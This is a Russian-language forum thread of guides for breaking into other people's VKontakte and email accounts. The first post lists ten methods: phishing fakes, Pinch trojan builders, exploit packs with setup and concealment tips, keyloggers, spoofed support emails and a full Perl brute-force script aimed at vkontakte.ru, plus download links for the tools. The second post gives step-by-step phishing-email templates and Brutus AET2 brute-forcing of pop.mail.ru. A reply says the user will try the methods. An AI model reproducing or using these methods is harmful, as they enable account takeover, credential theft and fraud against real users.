Форум поддержки раскрутки сайтов и форумов

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Форум поддержки раскрутки сайтов и форумов » Вконтакте » 10 способов взлома анкеты vkontakte.ru


10 способов взлома анкеты vkontakte.ru

Сообщений 1 страница 3 из 3

1

10 способов взлома анкеты vkontakte.ru
---------------------------------------------------------------
Что нам потребуется:
Умение настраивать пинч(если это у вас уже получилось, то остальные 2 требования можно не смотреть)
Прямые руки
Хоть капелька мозга
1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый", он

разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принимает "левый" вид, и соответственно не работает. не в этом

суть, поэтому останавливаться не будем
2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке http://slil.ru/25774471
3) Троян. Эту категорию мы разделим на другие.
а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. http://slil.ru/25774480 - здесь лежит билдер пинча, а

здесь парсер http://slil.ru/25774491 , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - http://slil.ru/25774495
б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100%
в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо)
Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777
Скачать 3 связки можно по ссылке http://slil.ru/25776403 - здесь лежат мпак, айспак и армитаж
ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже

переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни к чему...
Идем дальше...
Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был.
Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он

будет лежать в папке load под именем file.
Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет.
4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV)
Для этого брутфорсера нам потребуется активперл скачать мона тут http://download.softportal.com/softw...ctiveperl.html либо по ссылке

http://www.denwer.ru/packages/perl.html
Код:
#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80);
print $sock "HEAD http://vkontakte.ru/ HTTP/1.0rn".
"Host: vkontakte.rurn".
"Accept: */*rn".
"Content-Type: application/x-www-form-urlencodedrn".
"User-Agent: Mozillorn".
"C*****: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5rn".
"Connection: closernrn";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5n";
print "$id:$pass:$md5n";
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}

Не забудьте сменить разширение на brut.pl
$dic = ‘passl.txt’; #паслист для брдутфорсера
$id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы)
$mail = ‘мыло’; #мыло, значек @ меняем на %40
$threads = Х; # где Х - количество потоков
Если вам лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке http://slil.ru/25774498, сразу говорю, если не запускается - это

ваши проблемы, ибо все прекрасно работает!
5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код ******...
Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на

ссылке комбинированная атака на мозг(фейк) и браузер(код ******).
6)Способ приводится много где, здесь нужно поискать сайты на которых сидит жертва(форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного,

авось найдем старый заброшенный пароль, а он подойдет.
7) как обычно СИ, пробуем отправить письмо от адресата durov@vkontakte.ru или support@vkontakte.ru с текстом типа, ваша страница на сайте vkontakte.ru будет

заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля.
Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и пр, от такого-то пользователя, что бы ее прочитать перейдите по ссылке, а ссылка

будет вести на наш фейк.
Что-бы отправить письмо с "левого" адреса, нужен какой-нить майлер, например, этот http://softnic.ru/soft/programm_4223.html, либо любой подходящий для вас

из гугла.
Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия.(что бы пароли пришли именно вам на почту)
8) Снифер, тут лучше отправлять его на почту(если мы знаем мыло), тогда мы без лишних проблем сможем перехватить сессию, и с помощью системы восстановления пароля на сайте вконтакте получить письмо с паролем.
http://forum.antichat.ru/showthread.php?p=457280
Есть сниферы и получше, но они платные, все же тема распространена и в гуле можно ввсести запрос на пхп снифер и найти много полезной инфы.
9)ХSS, паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если ооочень долго подождать, то можно и дождаться паблик уязвимости - но

такой подход к делу бредовый, поэтому останавливаться на нем не будем.
10) Самый простой способ, единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог

ни один из 9 пунктов, может найдется умелец который сломает неприступную жертву. Поискать такогого можно здесь - http://www.hackzone.ru/forum/list/fid/23/ или здесь http://www.hackzone.ru/forum/list/fid/4/
Перед тем как задать вопрос воспользуйтесь полезными ссылками:
google.ru
http://www.poiskinfo.net/stat/st1.php
http://segfault.kiev.ua/smart-questions-ru.html
http://penguin.kurgan.ru/doc/Perl/perlfaq1.htm
Ну и на последок - googleforidiots.com
На этом все, надеюсь вам не особо скучно было при чтении всего этого.

0

2

Взлом аккаунта электронного почтового ящика.

Многие на форуме этого сайта спрашивали: «Как же все-таки можно взломать чей-либо email?» И вот, я решил написать статью о некоторых методах, которые я знаю и использую. Но предупреждаю: все это противозаконно, и не стоит злоупотреблять этим! За такие вещи можно отделаться штрафом, или получить срок (длительность я не знаю). Поэтому нужно делать все как можно незаметнее, без удаления чего-либо, или исправления чего-либо (я сам смеюсь когда пишу это - надо аккуратно, чуть-чуть). Ну, после небольшого вступления, можно начать.

Существует несколько способов взлома, вот те, которыми я пользуюсь (и кстати, без хвастовства: при помощи этих способов я уже взломал несколько аккаунтов): Потому как все технические баги на больших и известных почтовых серверах уже давно прикрыты, то нам придется использовать социальную инженерию.

Для начала можете прочитать статью, посвященную принципам работы социальной инженерии.

Способ 1

Необходимо завести человека в какой-нибудь чат (ICQ, IRC и т. д.) и заставить его дать вам ответ на секретный вопрос, который он задал при регистрации mail аккаунта, чтобы затем восстановить "Потерянный не вами пароль" через службу восстановления паролей на почтовом сервере. Об этом способе можно прочитать в статьях о Соц. инженерии.

Способ 2

Присылаем письмо жертве от имени администратора, в котором говорим, что кто-то хочет взломать его мыло (как это сделать грамотнее, напишу ниже). Далее пишем, откуда мы это узнали, типа «он превысил число ввода неправильных паролей», к примеру, 20 и делает это регулярно уже неделю. Желательно писать все научными словами (читай умными) чтобы человек не усомнился в том, что это письмо от администратора. Далее говорим ему, что необходимо поменять пароль на 000yo000, что это, якобы, специальный пароль по которому нарушителя должны вычислить, когда он его подберет. Подкрепите это все адресами, телефонами служба поддержки внизу письма для большей реалистичности.

Способ 3

Пишем письмо жертве. Набиваем в него всякой ерунды, типа адреса и картинки с порно сайтов, адреса магазинов, сайты знакомств. Пишешь, что такого вида рассылка будет повторяться ежедневно, а лучше по несколько раз в день. Пишешь также, что юзер, после принятия этой рассылки подписывается еще на 20 рассылок подобного рода. Короче надо написать такого, от чего у жертвы глаза на лоб залезут.Можно еще прикрепить к письму чего-нибудь на 500 кило, лучше порно картинки. Работает стопроцентно. Человек понимает, что с такими темпами его ящик будет всегда полон всякой ерундой, и места дня нормальных писем никогда не будет. Да и кому понравится вычищать свой ящик по десять раз на дню :) Ниже пишем, чтобы подтвердить подписку на эту рассылку, необходимо пойти по этой ссылке. Ниже пишем, чтобы отказаться от рассылки, необходимо пойти по этой ссылке. Естественно, после такого он кликнет на ссылке "отписаться", что нам и надо. Даем ссылку на созданный заранее сайт. Сайт может состоять из одной страницы. Для простоты берем главную страницу wwwmail.ru и переделываем ее под новую форму. На странице должно появится следующее: чтобы подтвердить, что отписаться от рассылки хотите именно вы, а не кто-то другой за вас, вас необходимо ввести пароль Желательно поставить так, чтобы логин стоял автоматически (value="hacked"). Можно попросить также подтверждение введенного пароля, чтобы этот лопух случайно не ошибся при вводе. Тогда один из паролей будет точно правильным. Но не переусердствуй, а то может заподозрить что-то неладное. После нажатия на кнопке "Отписаться", сработает субмит и результаты формы будут отправлены к тебе на e-mail.

Способ 4

Этот способ я еще не испробовал, но думаю на определенном контингенте он сработает, потому как отличается от остальных способов только телегой. Идем на mail и регистрируем себе мыло типа password-verify@mail.ru. Пишем письмо жертве в html стиле, оформляем его соответственно под стиль почтового сервиса. Как уже говорилось раннее, можно позаимствовать исходник со страницы регистрации и переделать его. В письме говорим о том, что сервер переполнен "мертвыми аккаунтами" и из-за этого начал медленно работать. Поэтому мы решили постирать "мертвые аакаунты", для чего необходимо провести верификацию пользователей. И если он (жертва) хочет и дальше ользоваться эти мылом, то ему необходимо в течение 7 дней подтвердить это, введя пароль от его ящика. Юзеры, кто не подтвердит, что его аккаунт является действующим, лишатся его и всей накопленной там корреспонденции без возможности восстановления утраченного. Дизайн формы должен соответствовать дизайну мыловой службы. Логин в форме должен появляться автоматически. Пароль должен отправляться на password-verify@mail.ru В конце письма для пущей уверенности необходимо указать, что пишет вам Администрация@mail.ru и что все честно.

Границы применимости этих способов. Хочу сразу предупредить, что описанные выше способы подходят далеко не для всех пользователей mail аккаунтов. Я вам больше скажу, что купятся на них очень не многие. Так как для этого надо иметь только голову и два уха. Такие есть не у всех. Как правило, у людей есть немного больше :-) У некоторых в области головы встречаются жидкие извилины, именуемые в народе мозгами. Теперь о том, как с этим бороться.

Если вам пришло письмо подобного содержания и вы уже (читай, до получения письма), прочитали мою статью, то поступаем следующим образом: вводим пароль и отсылаем его :-) ЭЭЭЭээ. Скажите вы. Это я так, шучу.

1. Можно конечно сразу удалить такое письмо, а нам это надо?

2. Правильно не надо. Давайте посмотрим, что за кекс хочет вас насадить. К примеру, вас пытаются одурачить описанным выше третьим способом. Что мы делаем: - Идем по ссылке "Отписаться от рассылки", что от нас и хотят. Попадаем на форму, где от нас хотят получить пароль для "проверки" наших праведных намерений отписаться. Смотрим адрес страницы - видим, что уже липа. Хрен с ней. Идем дальше, открываем source, и смотрим, куда отсылаются результаты заполнения формы. Вот он и попался. Теперь залезаем снова на свой ящик и пишем ему письмо по узнанному только что адресу, говорим что мы о нем думаем.

3. Можно сделать еще интереснее. Взять и забить в форму запроса паролей всякой херни, типа "Ну че олух? Хотел пароль! Да на, получи! Хрен тебе!" Ах да! Чуть не забыл!

Способ 5

Есть такая замечательная прога с названием «Brutus AET2», скачать ее можно здесь. Кстати, если антивирус будет говорить о «подозрительном действии программы», то не бойтесь, вирусов здесь нет.

Итак, а теперь о пользовании программой (кстати, в связи с переходом wwwmail.ru на «новое оборудование», там она может не работать): Для тех, у кого на винте нет ни одного словаря, в чем я сильно сомневаюсь, программа поможет сгенерировать свой (для тех, кто не знает, что такое словарь, объясняю: словарь- это список слов, которые могут быть паролем для того или иного почтового сервиса). Причем эту возможность мы бы посоветовали всем, даже тем, кто собирается ломать пароли какой-либо другой программой. "Зачем?", спросите Вы. А затем, что Вы вряд ли найдете где-нибудь еще возможность создать "мутирующий" словарь мегабайт на 30. А если у Вас уже есть готовые словари, то с помощью этой программы Вы сможете поудалять из них дубликаты или преобразовать словарь для Unix в словарь для Windows. Заманчиво, не правда ли?!

Тогда слушайте дальше. Программа позволит Вам применять Брутфорс (для любителей грубой физической силы), что у нее получается довольно неплохо. Итак, обсудив некоторые общие вопросы, переходим к частному, а именно к описанию функций Brutus AET2. ...к частному. Функции программы в детальном описании: - Menu Bar Отсюда Вы будите сохранять и загружать результаты уже проделаннй работы. Tools >> Wordlist Generation - обращение к Wordlist Tools. С него-то и начнем. Input list - имя используемого словаря. Output list - куда сохранить результаты. Функции меню: ~ Convert List (LF>CRLF) - конвертирует текстовые файлы формата Unix в текстовые файлы Dos формата. ~ Only Word Length - удаляет из обозначенного Вами словаря в Input list все слова, не соответствующие параметрам заданной длины. ~ Remove Duplicates - удаляет дупликаты слов. ~ Permutations - удаляет слова, которые можно получить путем перестановки, к примеру: если в словаре имеется слово Pas, то Брутус удалит из него слово sap и т.д. ~ Create New List - создание списка Users/Passwords "из ничего". Как уже было отмечено выше, это очень полезная вещь. Определяем символы, которые могут быть использованы в подбираемом пароле или имени, минимальную и максимальную длину и просим Брутус создать словарь нажатием кнопки Action. Если что-то не получилось, и словарь не создан, значит плохо просили :-)))

Дальше больше... - Target Сюда необходимо ввести адрес цели. xxx.xxx.xxx.xxx или буквами (в зависимости от того, что Вы знаете о жертве, и то и дугое узнать не трудно), например pop.mail.ru. - Type Выбираем, каким способом будет происходить перебор паролей. Кроме стандартных http (basic auth), ftp, pop3, telnet, smb и NetBus имеется Custom - пожалуй, наиболее сложная часть Брутуса, представляющая собой функцию "конфигурирования под себя". Здесь можно самостоятельно установить время задержки, после какого слова вводить user name, после какого password etc. Здесь хотелось бы отметить, что Brutus AET2 не является программой "для чайников" и ничего за Вас не сделает, если Вы не приложите к этому руку.

Использование этой программы подразумевает наличия у человека минимальных знаний и выше. Поэтому, если это первая программа, которую вы собираетесь использовать в своей ][-жизни, отложите ее на время и почитайте немного ][-Доков, никто Вас за это не осудит. - Connection Options ~ Port: ставится автоматически при использовании стандартных средств подборки паролей. ~ Connections - максимальное число одновременных соединений с сервером. ~ Timeout - время ожидания ответа сервера на посланный запрос. Чем больше Connections и Timeout, тем медленнее идет процесс перебора. ~ Proxy - используется для перебора паролей к серверу через прокси. - Authentification Options Здесь устанавливаем, что именно необходимо подобрать. Это может быть либо пароль из словаря с уже известным user-name, либо одновременный перебор User-name и Passwords по словарю. Up to You, как говорится. Здесь же прописывается путь к словарь, по которому будет происходить перебор. Для применения bruteforce атаки ставим PassMode >> Bruteforce, что позволяет определить минимальную и максимальную длину пароля, а также, из каких символов он должен состоять. В этом случае программа будет сама генерировать пароли - без какого-либо словаря. - Positive Authentification Results Не трудно догадаться, что именно здесь должны появляться подобранные пароли и логины. - Status Indication Будет оповещать Вас о ходе процесса перебора, постоянно помигивая одним из своих индикаторов. К примеру, мигающий Timeout означает, что данной функции было поставлено слишком маленькое значение и программа разорвала соединение с сервером, так и не получив ответа.

Небольшой пример: для взлома аккаунта на mail.ru необходимо использовать следующий алгаритм: Сначала нам понадобится вордлист (это файлик, где лежат часто используемые пароли). Теперь нам надо узнать pop3 сервер ломаемого мыла. Для этого идём туда, где это мыло зарегано, например, для мыла vasja@mail.ru мы пойдём на wwwmail.ru, а для мыла petja@aport.ru мы пойдём на wwwaport.ru =). Далее ищем раздел «Помощь», «Тех.поддержка» или «FAQ», ищём раздел, где нам предлагают настроить почтовые программы (Outlook, The Bat), выдёргиваем оттуда pop3 сервер (на mail.ru pop.mail.ru). Вставляем этот pop3 в поле TARGET нашего брутуса. В поле Type выбираем, естественно, pop3. Порт по умолчанию ставится 110 - оставляем. Connections - колличесиво попыток соединения. Timeout – таймаут одного соединения. «Modify sequence» не трогаем, это для хакеров ;) Идём дальше.

Итак, если мы ломаем конкретного человека, то ставим галочку USE USERNAME и SINGLE USER, вписываем в поле USERID имя пользователя (у мыла vasja@mail.ru -это vasja, НО на разных серверах может указываться по разному, это смотрим тоже в хелпе по настройке почтовых программ (см.выше)). В поле PASS MODE выбираем «Word list», и указываем путь к нашему ворд листу. Наконец, нажимаем START и ждём пароль =) Для безопасности можно использовать прокси, с этим проблем думаю не возникнет.

Да, и последнее: я обещал рассказать о более грамотном использовании способа номер 2, то есть, как проще подписаться админом какого-либо сайта. Существует небольшая последовательность:

1. Регистрируем новый почтовый ящик на сайте wwwrambler.ru.
2. Идем в пункт «Настройка»
3. видим там пункты типа «Кодировка», «просмотр папок», «просмотр писем» и т.д.
4. А вот и пункт «Создание писем», он то нам и нужен, видим фрейм Отправитель, вводим вместо вашего имени и адреса тот, который нужен, и нажимаем «Сохранить изменения» (там можно написать все, что угодно).

0

3

Нифига сибе статейка! Впервы слышу и вижу о таком )))) !!!

Класно! Буду пробовать  ;) Хоть какойто то должен подойти под мой мозг Гыыыы..

0


Вы здесь » Форум поддержки раскрутки сайтов и форумов » Вконтакте » 10 способов взлома анкеты vkontakte.ru


создать форум